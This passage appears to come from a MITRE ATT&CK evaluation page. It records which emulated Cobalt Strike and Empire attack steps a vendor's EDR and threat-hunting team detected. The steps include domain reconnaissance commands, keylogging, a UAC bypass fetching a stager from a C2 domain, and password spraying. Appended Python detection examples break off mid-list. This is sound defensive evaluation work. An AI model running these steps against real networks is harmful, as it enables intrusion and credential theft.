The OverWatch team also sent an email indicating a Specific Behavior was observed because a scheduled task was created for persistence. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing creation of the scheduled task
General Behavior alert from OverWatch indicating scheduled task creation was suspicious (tainted by previous cmd.exe detection by orange line indicating medium severity)
Email excerpt from OverWatch team indicating they observed a scheduled task establishing persistence (Specific Behavior)
8.A.1
Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd
File and Directory Discovery
(T1083)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe running dir. The process tree view showed the cmd.exe process that ran dir as tainted by a prior detection.
Telemetry showing cmd.exe running dir with command-line arguments (search was on commands running within the past 10 minutes)
Process tree view showing cmd.exe that ran dir (dir not specifically shown, cmd.exe is second from top and tainted by previous detection by orange line indicating medium severity)
8.A.2
Cobalt Strike: 'tree "C:\Users\debbie"' via cmd
File and Directory Discovery
(T1083)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe running tree with command-line arguments. The process tree view also showed the cmd.exe that was the parent for tree.com as tainted by a prior detection.
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert indicating tree.com was suspicious. The process tree view showed the alert as tainted by a previous cmd.exe detection. OverWatch is the managed threat hunting service.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was identified because tree was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing cmd.exe running tree with command-line arguments (search was on commands running within the past 10 minutes)
OverWatch General Behavior alert indicating tree.com was suspicious (tainted by previous detection by orange line indicating medium severity)
Additional details for OverWatch General Behavior alert indicating tree.com was suspicious (tainted by previous detection by orange line indicating medium severity)
Email excerpt from the OverWatch team indicating tree was a reconnaissance command (General Behavior)
8.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
  
No detection capability demonstrated for this procedure.
8.C.1
Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie
Input Capture
(T1056)
None
  
No detection capability demonstrated for this procedure, though telemetry showed explorer.exe injecting from a known beacon (does not detect input capture specifically).
Telemetry showing injected thread events (explorer.exe, pid=21776848613, injecting from cmd.exe, pid=21898821890) (does not count as a detection)
Application Window Discovery
(T1010)
None
  
No detection capability demonstrated for this procedure.
8.D.1
Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie
Screen Capture
(T1113)
None
  
No detection capability demonstrated for this procedure, though telemetry showed explorer.exe injecting from a known beacon (does not detect screen capture specifically).
Telemetry showing injected thread events (explorer.exe, pid=21776848613, injecting from cmd.exe, pid=21898821890) (does not count as a detection)
Process Injection
(T1055)
Telemetry
  
Telemetry showed InjectedThread events for explorer.exe (pid=21776848613) injecting from cmd.exe (pid=21898821890), which is a known beacon.
Telemetry showing injected thread events (explorer.exe, pid=21776848613, injecting from cmd.exe, pid=21898821890)
9.A.1
Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
9.B.1
Cobalt Strike: Built-in download capability executed to collect a file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Data from Network Shared Drive
(T1039)
None
  
No detection capability demonstrated for this procedure.
Exfiltration Over Command and Control Channel
(T1041)
None
  
No detection capability demonstrated for this procedure.
10.A.1
Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32
Registry Run Keys / Startup Folder
(T1060)
Telemetry
  
Telemetry showed cmd.exe running autoupdate.bat from the Startup folder.
Telemetry showing cmd.exe running autoupdate.bat from Startup folder
10.A.2
Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32
Scheduled Task
(T1053)
Telemetry (Tainted)
  
 
Telemetry showed rundll32.exe starting updater.dll. The telemetry was tainted by the parent OverWatch alert.
Telemetry showing rundll32.exe executing updater.dll (tainted by the parent OverWatch alert)
10.B.1
RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse
Remote Desktop Protocol
(T1076)
Telemetry
  
Telemetry showed the remote connection to Conficker for a user logon by Jesse with type 10 (interactive) as well as the use of rdpclip.exe by the logged-on user.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior occurred because they observed suspicious communications over 3389 (RDP) to other hosts. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing user logon by Jesse to Conficker with type 10 (interactive logon)
Telemetry showing logged-on user activity, including the use of rdpclip.exe
Email excerpt from the OverWatch team indicating suspicious communications over 3389 (RDP) were observed (General Behavior)
Valid Accounts
(T1078)
Telemetry
  
Telemetry showed a type 10 (interactive) UserLogon event for Jesse.
Telemetry showing user logon by Jesse to Conficker
11.A.1
Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)
Scripting
(T1064)
Specific Behavior
  
A Specific Behavior alert was generated indicating "A PowerShell script launched that shares characteristics with known PowerShell exploit kits."
General Behavior (Delayed)
  
 
A General Behavior alert was generated from OverWatch indicating wscript.exe executing launcher.vbs was suspicious. OverWatch is the managed threat hunting service.
Telemetry
  
Telemetry within the OverWatch alert showed wscript.exe executing launcher.vbs, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a Specific Behavior was observed because a malicious script invoked by wscript was run by Bob on CodeRed and launched PowerShell. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Specific Behavior alert for PowerShell sharing characteristics with known exploit kits
General Behavior alert from OverWatch for wscript.exe executing launcher.vbs was suspicious
Email excerpt from the OverWatch team indicating a malicious script was run (Specific Behavior)
11.B.1
Empire: C2 channel established
Commonly Used Port
(T1043)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe making a connection to 192.168.0.5 (C2 server) over port 443. The telemetry was tainted by an alert on its parent powershell.exe process.
Telemetry showing powershell.exe making a network connection over port 443 (tainted by parent powershell.exe high severity alert indicated by red icon)
Standard Application Layer Protocol
(T1071)
None
  
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over port 443 (no protocol was identified for this traffic).
Telemetry showing powershell.exe making a network connection over port 443 (does not count as a detection)
Standard Cryptographic Protocol
(T1032)
None
  
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over port 443 (no protocol was identified for this traffic).
Telemetry showing powershell.exe making a network connection over port 443 (does not count as a detection)
12.A.1
Empire: 'route print' via PowerShell
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing route.exe with command-line arguments. The process tree view showed route.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because route print was part of the basic reconnaissance activity performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing route.exe with command-line arguments (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating route print was part of basic reconnaissance activity (General Behavior)
12.A.2
Empire: 'ipconfig /all' via PowerShell
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing ipconfig.exe with command-line arguments. The process tree view showed ipconfig.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because ipconfig was part of the basic reconnaissance activity performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing ipconfig.exe with command-line arguments (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating ipconfig was part of basic reconnaissance activity (General Behavior)
12.B.1
Empire: 'whoami /all /fo list' via PowerShell
System Owner / User Discovery
(T1033)
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert indicating whoami.exe with command-line arguments was suspicious. The process tree view showed whoami.exe as tainted by a previous powershell.exe detection. OverWatch is the managed threat hunting service.
Telemetry
  
Telemetry within the OverWatch alert showed powershell.exe executing whoami.exe with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because whoami was part of the basic reconnaissance activity performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
OverWatch General Behavior alert and telemetry indicating whoami.exe with command-line arguments was suspicious (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating whoami was part of basic reconnaissance activity (General Behavior)
12.C.1
Empire: 'qprocess *' via PowerShell
Process Discovery
(T1057)
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert indicating qprocess.exe with command-line arguments was suspicious. The process tree view showed qprocess.exe as tainted by a previous powershell.exe detection. OverWatch is the managed threat hunting service.
Telemetry
  
Telemetry within the OverWatch alert showed execution of qprocess.exe with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because qprocess was part of the basic reconnaissance activity performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
OverWatch General Behavior alert and telemetry indicating qprocess.exe with command-line arguments was suspicious (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating qprocess was part of basic reconnaissance activity (General Behavior)
12.D.1
Empire: 'net start' via PowerShell
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe and net1.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because net start was part of the basic reconnaissance activity performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing net.exe with command-line arguments (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating net start was part of basic reconnaissance activity (General Behavior)
12.E.1
Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques
Scripting
(T1064)
Telemetry
  
Telemetry showed the PowerShell script (.ps1) being written to the temp folder.
Specific Behavior (Delayed)
  
 
The OverWatch team generated a Specific Behavior alert indicating the PowerShell script was malicious. OverWatch is the managed threat hunting service.
Specific Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating they identified a Specific Behavior for an unidentified PowerShell script running. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing the temp write of the ps1 script
OverWatch Specific Behavior alert indicating the PowerShell script was malicious
Email excerpt from OverWatch team indicating they observed an unidentified PowerShell script running (Specific Behavior)
12.E.1.1
Empire: WinEnum module included enumeration of user information
System Owner / User Discovery
(T1033)
None
  
No detection capability demonstrated for this procedure.
12.E.1.2
Empire: WinEnum module included enumeration of AD group memberships
Permission Groups Discovery
(T1069)
None
  
No detection capability demonstrated for this procedure.
12.E.1.3
Empire: WinEnum module included enumeration of password policy information
Password Policy Discovery
(T1201)
None
  
No detection capability demonstrated for this procedure.
12.E.1.4.1
Empire: WinEnum module included enumeration of recently opened files
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
12.E.1.4.2
Empire: WinEnum module included enumeration of interesting files
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
12.E.1.5
Empire: WinEnum module included enumeration of clipboard contents
Clipboard Data
(T1115)
None
  
No detection capability demonstrated for this procedure, though telemetry showed execution of an encoded PowerShell command and OverWatch alerted on it as suspicious. The PowerShell decoded to Windows.Clipboard(...) outside of the capability, which indicated clipboard interaction, but this was not counted as a detection because it was external to the capability.
Telemetry showing encoded PowerShell, which decodes to show Windows.Clipboard details (does not count as a detection)
Decoding (outside the capability) of encoded PowerShell command to show Windows.Clipboard details (does not count as a detection)
OverWatch alert indicating encoded PowerShell was suspicious (does not count as a detection)
12.E.1.6.1
Empire: WinEnum module included enumeration of system information
System Information Discovery
(T1082)
Telemetry
  
Telemetry from decoded PowerShell (within the capability) showed the Get-Sysinfo function.
Telemetry showing the Get-Sysinfo function
12.E.1.6.2
Empire: WinEnum module included enumeration of Windows update information
System Information Discovery
(T1082)
None
  
No detection capability demonstrated for this procedure.
12.E.1.7
Empire: WinEnum module included enumeration of system information via a Registry query
Query Registry
(T1012)
Telemetry
  
Telemetry from decoded PowerShell (within the capability) showed the Get-Sysinfo function.
Telemetry showing the Get-Sysinfo function
12.E.1.8
Empire: WinEnum module included enumeration of services
System Service Discovery
(T1007)
None
  
No detection capability demonstrated for this procedure.
12.E.1.9.1
Empire: WinEnum module included enumeration of available shares
Network Share Discovery
(T1135)
None
  
No detection capability demonstrated for this procedure.
12.E.1.9.2
Empire: WinEnum module included enumeration of mapped network drives
Network Share Discovery
(T1135)
None
  
No detection capability demonstrated for this procedure.
12.E.1.10.1
Empire: WinEnum module included enumeration of AV solutions
Security Software Discovery
(T1063)
None
  
No detection capability demonstrated for this procedure.
12.E.1.10.2
Empire: WinEnum module included enumeration of firewall rules
Security Software Discovery
(T1063)
None
  
No detection capability demonstrated for this procedure.
12.E.1.11
Empire: WinEnum module included enumeration of network adapters
System Network Configuration Discovery
(T1016)
None
  
No detection capability demonstrated for this procedure.
12.E.1.12
Empire: WinEnum module included enumeration of established network connections
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing netstat.exe with command-line arguments. The process tree view showed netstat.exe as tainted by a previous powershell.exe detection.
Telemetry from process tree showing netstat.exe with command-line arguments (tainted from previous powershell.exe detection by red line indicating high severity)
12.F.1
Empire: 'net group "Domain Admins" /domain' via PowerShell
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection.
Enrichment (Tainted)
  
 
The capability enriched net.exe with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). The process tree view showed net.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because net group was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing net.exe with command-line arguments (tainted from previous powershell.exe detection by red line indicating high severity)
Enrichment of net.exe with related ATT&CK Technique (Account Discovery) and correct Tactic (Discovery) (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating net group was part of additional malicious discovery activity (General Behavior)
12.F.2
Empire: 'net localgroup administrators' via PowerShell
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because net localgroup was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing net.exe with command-line arguments (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating net localgroup was part of additional malicious discovery activity (General Behavior)
12.G.1
Empire: 'net user' via PowerShell
Account Discovery
(T1087)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because net user was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing net.exe with command-line arguments (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating net user was part of additional malicious discovery activity (General Behavior)
12.G.2
Empire: 'net user /domain' via PowerShell
Account Discovery
(T1087)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because net user was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing net.exe with command-line arguments (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating net user was part of additional malicious discovery activity (General Behavior)
13.A.1
Empire: 'net group "Domain Computers" /domain' via PowerShell
Remote System Discovery
(T1018)
Telemetry (Tainted)
  
 
Telemetry showed net.exe executing with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection.
Enrichment (Tainted)
  
 
The capability enriched net.exe with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). The process tree view showed the enrichment was tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because net group was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing net.exe with command-line arguments (tainted by previous powershell.exe detection by red line indicating high severity)
Enrichment of net.exe with related ATT&CK Technique (Account Discovery) and correct Tactic (Discovery) (tainted by previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating net group was part of additional malicious discovery activity (General Behavior)
13.B.1
Empire: 'net use' via PowerShell
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
  
 
Telemetry showed net.exe executing with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because net use was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing net.exe with command-line arguments (tainted by previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating net use was part of additional malicious discovery activity (General Behavior)
13.B.2
Empire: 'netstat -ano' via PowerShell
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
  
 
Telemetry showed netstat.exe executing with command-line arguments. The process tree view showed netstat.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because netstat was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing netstat.exe with command-line arguments (tainted by previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating netstat was part of additional malicious discovery activity (General Behavior)
13.C.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments. The process tree view showed reg.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert identifying reg.exe execution as suspicious. The alert was tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because reg query was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing reg.exe with command-line arguments (tainted by previous powershell.exe detection by red line indicating high severity)
OverWatch General Behavior alert indicating reg query was suspicious (tainted by previous powershell.exe detection by orange line indicating medium severity)
OverWatch General Behavior alert indicating reg query was suspicious
Email excerpt from the OverWatch team indicating reg query was part of additional malicious discovery activity (General Behavior)
14.A.1
Empire: UAC bypass module downloaded and executed a new Empire stager (wdbypass)
Bypass User Account Control
(T1088)
Telemetry
  
Telemetry showed an integrity level change through a query for powershell.exe processes of high integrity (12288/0x3000) that were created by medium integrity processes (8192/0x2000), which is indicative of bypassing UAC. Telemetry also showed the Invoke-BypassUACTokenManipulation function in the script.
Specific Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a Specific Behavior was observed because a base64 obfuscated PowerShell command was used to invoke UAC bypass. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing integrity level change through query for powershell.exe processes of high integrity (12288/0x3000) that were created by medium integrity processes (8192/0x2000)
Telemetry showing the Invoke-BypassUACTokenManipulation function
Email excerpt from the OverWatch team indicating obfuscated PowerShell invoked UAC bypass (Specific Behavior)
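The integrity-level pattern the telemetry note above describes (a High-integrity powershell.exe, 12288/0x3000, created by a Medium-integrity parent, 8192/0x2000) can be checked directly in process-creation records. The block below is an added example, not code from the evaluation page or the vendor; the record field names (ProcessId, ParentProcessId, ImageFileName, IntegrityLevel, ScriptText) and the sample events are constructed assumptions about what a generic EDR process event carries.

```python
"""Flag the UAC-bypass telemetry shape from step 14.A.1 (added example)."""
from typing import Dict, List

# Windows mandatory integrity level RIDs as they appear in the telemetry.
MEDIUM_INTEGRITY = 0x2000  # 8192
HIGH_INTEGRITY = 0x3000    # 12288

# Constructed sample process-creation records (field names are assumptions).
# pid 300 reproduces the page's pattern: a High-integrity powershell.exe whose
# parent powershell.exe ran at Medium integrity, with the decoded script text
# carrying the Invoke-BypassUACTokenManipulation function name.
SAMPLE_EVENTS: List[Dict] = [
    {"ProcessId": 100, "ParentProcessId": 4,
     "ImageFileName": r"C:\Windows\explorer.exe",
     "IntegrityLevel": MEDIUM_INTEGRITY, "ScriptText": ""},
    {"ProcessId": 200, "ParentProcessId": 100,
     "ImageFileName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "IntegrityLevel": MEDIUM_INTEGRITY, "ScriptText": ""},
    {"ProcessId": 300, "ParentProcessId": 200,
     "ImageFileName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "IntegrityLevel": HIGH_INTEGRITY,
     "ScriptText": "function Invoke-BypassUACTokenManipulation { ... }"},
    # A legitimate elevated admin console: the parent is already High, so no jump.
    {"ProcessId": 400, "ParentProcessId": 4,
     "ImageFileName": r"C:\Windows\System32\cmd.exe",
     "IntegrityLevel": HIGH_INTEGRITY, "ScriptText": ""},
    {"ProcessId": 500, "ParentProcessId": 400,
     "ImageFileName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "IntegrityLevel": HIGH_INTEGRITY, "ScriptText": ""},
]

# Function-name prefix seen in the page's decoded script (Invoke-BypassUAC...).
UAC_BYPASS_MARKERS = ("invoke-bypassuac",)


def find_integrity_jumps(events: List[Dict], image: str = "powershell.exe") -> List[Dict]:
    """Return processes of `image` running at High whose parent ran at Medium."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for e in events:
        if not e["ImageFileName"].lower().endswith(image):
            continue
        if e["IntegrityLevel"] != HIGH_INTEGRITY:
            continue
        parent = by_pid.get(e["ParentProcessId"])
        if parent is None or parent["IntegrityLevel"] != MEDIUM_INTEGRITY:
            continue
        findings.append({"pid": e["ProcessId"],
                         "parent_pid": parent["ProcessId"],
                         "parent_image": parent["ImageFileName"]})
    return findings


def has_uac_bypass_marker(script_text: str) -> bool:
    """True when the decoded script text names a known UAC-bypass function."""
    text = script_text.lower()
    return any(marker in text for marker in UAC_BYPASS_MARKERS)


def triage(events: List[Dict]) -> List[Dict]:
    """Combine the integrity jump with script content to rank each finding."""
    by_pid = {e["ProcessId"]: e for e in events}
    results = []
    for finding in find_integrity_jumps(events):
        script = by_pid[finding["pid"]].get("ScriptText", "")
        severity = "high" if has_uac_bypass_marker(script) else "medium"
        results.append({**finding, "severity": severity})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(r)
```

The integrity jump on its own is a hunting signal rather than a verdict: a user approving a consent prompt also yields a High-integrity child whose recorded parent is the Medium-integrity requester, which is why the triage step also looks at the decoded script content the page mentions before raising severity.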
Commonly Used Port
(T1043)
Telemetry
  
Telemetry showed a network connection event to 192.168.0.5 (C2 server) on TCP port 8080 that was associated with the encoded PowerShell IEX command.
Telemetry showing IEX connection over to 192.168.0.5 (C2 server) on TCP port 8080
Remote File Copy
(T1105)
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a Specific Behavior was observed because PowerShell retrieved the file wdbypass from www.freegoogleadsenseinfo.com (C2 domain) over port 8080. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Email excerpt from the OverWatch team indicating PowerShell retrieved the file wdbypass (Specific Behavior)
Standard Application Layer Protocol
(T1071)
None
  
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080.
Telemetry showing encoded PowerShell command that decodes to show HTTP traffic (does not count as a detection)
Decoded PowerShell (outside of capability) showing download request over HTTP (does not count as a detection)
15.A.1
Empire: Built-in keylogging module executed to capture keystrokes of user Bob
Application Window Discovery
(T1010)
Telemetry
  
Telemetry showed the decoded PowerShell script, which displayed the API call GetForegroundWindow to enumerate the active window.
Telemetry showing decoded PowerShell script containing the API call GetForegroundWindow
Input Capture
(T1056)
Telemetry
  
Telemetry showed the decoded PowerShell script, which displayed the function Get-Keystrokes.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a Specific Behavior was identified because they observed the adversary logging keystrokes based on the GetKeystrokes PowerShell function. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing decoded PowerShell script containing the function Get-Keystrokes
Excerpt from email sent by OverWatch team indicating keylogging activity occurred (Specific Behavior)
Excerpt from email sent by OverWatch team indicating IT_tasks.txt was retrieved as a file of interest (General Behavior)
15.B.1
Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Credentials in Files
(T1081)
Telemetry
  
Telemetry showed a file read event for IT_tasks.txt by powershell.exe as well as a FsPostOpen event indicating IT_tasks.txt was opened.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because IT_tasks.txt was retrieved from a network share as a file of interest. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing file read event for IT_tasks.txt
Telemetry showing FsPostOpen event for IT_tasks.txt
Excerpt from email sent by OverWatch team indicating IT_tasks.txt was retrieved as a file of interest (General Behavior)
16.A.1
Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda
Brute Force
(T1110)
Telemetry
  
Telemetry showed repeated logon attempts via net.exe with command-line arguments indicative of password spraying, including details that the logons were for local admin (type 6) and that they failed.
General Behavior (Delayed, Tainted)
  
  
OverWatch generated General Behavior alerts indicating the net use commands were suspicious. The alerts were tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally using several accounts. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing net.exe logon attempts
Telemetry showing details for the logon attempt into 10.0.1.4 (Morris) showing UserLogonFlags_decimal is equal to 6 (attempt for local admin) and UserLogonFailed (no distinction between authentication failure and authorization failure)
Telemetry showing details for the logon attempt into 10.0.1.6 (Nimda) showing UserLogonFlags_decimal is equal to 6 (attempt for local admin) and UserLogonFailed (no distinction between authentication failure and authorization failure)
Process tree view of OverWatch General Behavior alerts indicating net.exe commands were suspicious (net.exe command details not specifically shown, tainted by previous powershell.exe detection by red line indicating high severity)
Excerpt from email sent by OverWatch team indicating Bob attempted to move laterally (General Behavior)
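The Brute Force telemetry above (repeated failed net.exe logons for several users against several hosts, with UserLogonFlags_decimal 6 and UserLogonFailed) is the raw material for a password-spray detection, and the later step 16.B.1 shows the pattern a defender most wants to catch: a success following the failures. The block below is an added example, not code from the evaluation page or the vendor; the record layout (ts, SourceHost, TargetHost, UserName, UserLogonFlags_decimal, UserLogonFailed) and the sample events are constructed, modelled loosely on the users and hosts named on the page.

```python
"""Password-spray detection over constructed net.exe logon telemetry (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# The page reads UserLogonFlags_decimal == 6 as an attempt for local admin.
LOCAL_ADMIN_LOGON_FLAGS = 6

# Constructed sample events (timestamps and field names are assumptions).
SAMPLE_LOGONS: List[Dict] = [
    {"ts": "2024-01-01T10:00:01", "SourceHost": "CodeRed", "TargetHost": "10.0.1.4",
     "UserName": "Kmitnick", "UserLogonFlags_decimal": 6, "UserLogonFailed": True},
    {"ts": "2024-01-01T10:00:03", "SourceHost": "CodeRed", "TargetHost": "10.0.1.4",
     "UserName": "Bob", "UserLogonFlags_decimal": 6, "UserLogonFailed": True},
    {"ts": "2024-01-01T10:00:05", "SourceHost": "CodeRed", "TargetHost": "10.0.1.4",
     "UserName": "Frieda", "UserLogonFlags_decimal": 6, "UserLogonFailed": True},
    {"ts": "2024-01-01T10:00:08", "SourceHost": "CodeRed", "TargetHost": "10.0.1.6",
     "UserName": "Kmitnick", "UserLogonFlags_decimal": 6, "UserLogonFailed": True},
    {"ts": "2024-01-01T10:00:10", "SourceHost": "CodeRed", "TargetHost": "10.0.1.6",
     "UserName": "Bob", "UserLogonFlags_decimal": 6, "UserLogonFailed": True},
    {"ts": "2024-01-01T10:00:12", "SourceHost": "CodeRed", "TargetHost": "10.0.1.6",
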